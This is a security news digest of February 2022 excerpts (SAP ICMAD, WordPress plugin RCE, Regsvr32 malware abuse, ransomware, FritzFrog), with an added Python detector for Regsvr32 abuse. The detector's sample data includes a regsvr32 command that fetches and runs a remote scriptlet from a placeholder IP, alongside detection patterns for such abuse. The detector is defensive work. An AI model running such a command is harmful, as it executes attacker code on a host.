February 10, 2022

Fortify Security Team

Title: CISA Warns Admins to Patch Maximum Severity SAP Vulnerability

Date Published: February 9, 2022

https://www.bleepingcomputer.com/news/security/cisa-warns-admins-to-patch-maximum-severity-sap-vulnerability/

Excerpt: “The US Cybersecurity and Infrastructure Security Agency (CISA) has warned admins to patch a set of severe security flaws dubbed ICMAD (Internet Communication Manager Advanced Desync) and impacting SAP business apps using Internet Communication Manager (ICM). CISA added that failing to patch these vulnerabilities exposes organizations with vulnerable servers to data theft, financial fraud risks, disruptions of mission-critical business processes, ransomware attacks, and a halt of all operations.”

Title: Critical RCE Flaws in PHP Everywhere WordPress Plugin Affect Thousands of Sites

Date Published: February 10, 2022

https://securityaffairs.co/wordpress/127848/hacking/rce-php-everywhere-wordpress-plugin.html

Excerpt: “Wordfence experts found three critical remote code execution vulnerabilities in the PHP Everywhere WordPress plugin, all the issues have received a CVSS score of 9.9. The plugin allows WordPress admins to insert PHP code in pages, posts, the sidebar, or any Gutenberg block, to display dynamic content based on evaluated PHP expressions.”

Title: Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware

Date Published: February 9, 2022

https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/

Excerpt: “A Windows living-off-the-land binary (LOLBin) known as Regsvr32 is seeing a big uptick in abuse of late, researchers are warning, mainly spreading trojans like Lokibot and Qbot. LOLBins are legitimate, native utilities used daily in various computing environments, that cybercriminals use to evade detection by blending into normal traffic patterns. In this case, Regsvr32 is a Microsoft-signed command line utility in Windows that allows users to register and unregister libraries. By registering a .DLL file, information is added to the central directory (the Registry) so that it can be used by Windows and shared among programs.”
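Because Regsvr32 is signed and present on every Windows host, blocking it outright is rarely an option; the practical control is to watch how it is invoked. The following is an added example, not code from the Threatpost article or from any vendor: a small detector that runs over constructed process-creation records (the format mimics a flattened Sysmon Event ID 1 export, image | parent image | command line, and the sample lines are made up for this example) and flags the invocation patterns that distinguish abuse from routine DLL registration. The heuristics, the parent-process list and the path patterns are the author's assumptions, not rules from the article.

```python
import re

# Constructed sample events (not real telemetry). Format: image|parent image|command line
SAMPLE_EVENTS = [
    r"C:\Windows\System32\regsvr32.exe|C:\Windows\explorer.exe|regsvr32.exe /s C:\Program Files\Vendor\vendor.dll",
    r"C:\Windows\System32\regsvr32.exe|C:\Windows\System32\WScript.exe|regsvr32.exe /s /n /u /i:http://198.51.100.7/payload.sct scrobj.dll",
    r"C:\Windows\SysWOW64\regsvr32.exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|regsvr32 /s C:\Users\alice\AppData\Local\Temp\inv0ice.ocx",
    r"C:\Windows\System32\regsvr32.exe|C:\Windows\System32\services.exe|regsvr32.exe /s C:\Windows\System32\msxml3.dll",
]

# Heuristic 1 (assumption): /i: pointing at a URL or UNC path, or loading scrobj.dll,
# means Regsvr32 is being used to run a remote scriptlet rather than register a local DLL.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(https?|ftp|\\\\)", re.IGNORECASE)
SCROBJ = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)

# Heuristic 2 (assumption): the module being registered lives in a user-writable location,
# which is where a downloaded or dropped payload would land.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)|Temp|ProgramData|Users\\Public)\\",
    re.IGNORECASE,
)

# Heuristic 3 (assumption): parents that match a document- or script-driven infection chain.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
    "msedge.exe", "chrome.exe", "firefox.exe",
}


def parse_event(line: str) -> dict:
    """Split one flattened record into its three fields."""
    image, parent, cmdline = line.split("|", 2)
    return {"image": image, "parent": parent, "cmdline": cmdline}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> list:
    """Return the list of reasons an event looks like Regsvr32 abuse (empty if benign)."""
    reasons = []
    if _basename(event["image"]) != "regsvr32.exe":
        return reasons
    cmd = event["cmdline"]
    if REMOTE_SCRIPTLET.search(cmd) or SCROBJ.search(cmd):
        reasons.append("remote or scriptlet COM registration (/i: with URL or scrobj.dll)")
    parent = _basename(event["parent"])
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    if USER_WRITABLE.search(cmd):
        reasons.append("module path in user-writable location")
    return reasons


def scan(lines) -> list:
    """Return (command line, reasons) for every event that trips at least one heuristic."""
    findings = []
    for line in lines:
        event = parse_event(line)
        reasons = analyze(event)
        if reasons:
            findings.append((event["cmdline"], reasons))
    return findings


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_EVENTS):
        print(cmdline)
        for reason in reasons:
            print("  -", reason)
```

Run against the constructed events, the detector ignores the two routine registrations (an installer under Program Files, a system DLL under services.exe) and flags the remote-scriptlet invocation and the Office-spawned registration of a module in the user's Temp directory. In production, the data source would be Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled, and the heuristics need tuning: legitimate installers do register DLLs from Temp, so allowlist known installer parents and correlate with network egress from the Regsvr32 process before paging anyone.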

Title: Ransomware Attacks, and Ransom Payments, are Rampant Among Critical Infrastructure Organizations

Date Published: February 10, 2022

https://www.helpnetsecurity.com/2022/02/10/critical-infrastructure-ransomware/

Excerpt: “80% of critical infrastructure organizations experienced a ransomware attack in the last year, with an equal number reporting that their security budgets have risen since 2020, a Claroty report reveals. The report is based on an independent global survey of 1,100 information technology (IT) and operational technology (OT) professionals who work in critical infrastructure sectors, exploring how they have dealt with the significant challenges in 2021, their levels of resiliency, and priorities moving forward.”

Title: Russia Cracks Down on 4 Dark Web Marketplaces for Stolen Credit Cards

Date Published: February 9, 2022

https://thehackernews.com/2022/02/russia-cracks-down-on-4-dark-web.html

Excerpt: “A special law enforcement operation undertaken by Russia has led to the seizure and shutdown of four online bazaars that specialized in the theft and sales of stolen credit cards, as the government continues to take active measures against harboring cybercriminals on its territory. To that end, the domains operated by the card fraud forums and marketplaces, Ferum Shop, Sky-Fraud, Trump’s Dumps, and UAS, were confiscated and plastered with a banner that warned ‘theft of funds from bank cards is illegal.’ Also embedded into the HTML source code was a message asking, ‘Which one of you is next?’”

Title: Microsoft Will Block Macros by Default from Internet Downloads

Date Published: February 9, 2022

https://www.scmagazine.com/analysis/application-security/microsoft-will-block-macros-by-default-from-internet-downloads

Excerpt: “Microsoft will make it even more difficult to download and run malicious Office documents from the internet, the company announced this week. It’s a change welcomed by security pros. Office macros, which provide programming functions for use in common workplace documents, have been a launching pad for malicious actors since the Clinton administration. The Concept Virus first appeared in 1995. Nearly thirty years later, it is still a problem, despite Microsoft’s previous efforts to curb adversarial use.”

Title: Linux Malware on the Rise

Date Published: February 9, 2022

https://www.darkreading.com/cloud/linux-malware-on-the-rise-including-illicit-use-of-cobalt-strike

Excerpt: “With Linux frequently used as the basis for cloud services, virtual-machine hosts, and container-based infrastructure, attackers have increasingly targeted Linux environments with sophisticated exploits and malware. New analysis, based on telemetry collected from attacks on VMware customers, shows an increasing number of ransomware programs targeting Linux hosts to infect virtual-machine images or containers; more use of cryptojacking to monetize illicit access; and more than 14,000 instances of Cobalt Strike — 56% of which are pirated copies used by criminals or thrifty companies that have not bought licenses. The red-team tool has become so popular as a way to manage compromised machines that underground developers created their own protocol-compatible version of the Windows program for Linux, VMware states in a newly released report, ‘Exposing Malware in Linux-based Multi-Cloud Environments.’”

Title: FritzFrog Botnet Grows 10x, Hits Healthcare, EDU, and Govt Systems

Date Published: February 10, 2022

https://www.bleepingcomputer.com/news/security/fritzfrog-botnet-grows-10x-hits-healthcare-edu-and-govt-systems/

Excerpt: “The FritzFrog botnet that’s been active for more than two years has resurfaced with an alarming infection rate, growing ten times in just a month of hitting healthcare, education, and government systems with an exposed SSH server. Discovered in August 2020, the malware is written in Golang and is considered to be a sophisticated threat that relies on custom code, runs in memory, and is decentralized — peer-to-peer (P2P), so it does not need a central management server.”

Title: CISA, FBI, NSA Issue Advisory on Severe Increase in Ransomware Attacks

Date Published: February 10, 2022

https://thehackernews.com/2022/02/cisa-fbi-nsa-issue-advisory-on-severe.html

Excerpt: “Cybersecurity authorities from Australia, the U.K., and the U.S. have published a joint advisory warning of an increase in sophisticated, high-impact ransomware attacks targeting critical infrastructure organizations across the world in 2021. The incidents singled out a broad range of sectors, including defense, emergency services, agriculture, government facilities, IT, healthcare, financial services, education, energy, charities, legal institutions, and public services.”

Title: Cloud Migrations are Taking Longer, and Require Bigger Budgets than Expected

Date Published: February 10, 2022

https://www.helpnetsecurity.com/2022/02/10/using-multi-cloud-platform/

Excerpt: “84% of IT decision-makers across the US and UK say their organization is currently using more than one cloud platform, as businesses’ demands for more choice, flexibility, and agility pushes multi-cloud mainstream in the year ahead, according to a Wanclouds report. The report found that of companies using multiple cloud platforms, 48% are also taking a hybrid approach by utilizing both public and private clouds.”
